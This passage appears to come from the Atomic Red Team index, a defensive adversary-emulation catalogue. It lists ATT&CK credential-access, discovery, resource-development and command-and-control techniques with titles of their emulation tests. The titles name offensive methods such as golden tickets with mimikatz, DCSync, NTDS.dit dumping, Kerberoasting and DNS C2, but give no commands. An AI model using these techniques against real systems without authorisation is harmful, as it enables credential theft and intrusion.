- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- Atomic Test #6: WinPwn - sensitivefiles [windows]
- Atomic Test #7: WinPwn - Snaffler [windows]
- Atomic Test #8: WinPwn - powershellsensitive [windows]
- Atomic Test #9: WinPwn - passhunt [windows]
- Atomic Test #10: WinPwn - SessionGopher [windows]
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [containers]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- Atomic Test #3: WinPwn - GPOAudit [windows]
- Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- Atomic Test #15: WinPwn - generaldomaininfo [windows]
- Atomic Test #16: Kerbrute - userenum [windows]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #8: WinPwn - shareenumeration [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- Atomic Test #13: WinPwn - winPEAS [windows]
- Atomic Test #14: WinPwn - itm4nprivesc [windows]
- Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
- Atomic Test #16: WinPwn - General privesc checks [windows]
- Atomic Test #17: WinPwn - GeneralRecon [windows]
- Atomic Test #18: WinPwn - Morerecon [windows]
- Atomic Test #19: WinPwn - RBCD-Check [windows]
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
- Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- Atomic Test #24: Linux List Kernel Modules [linux]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #8: List macOS Firewall Rules [macos]
- Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #3: System Time Discovery in macOS [macos]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# command-and-control
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
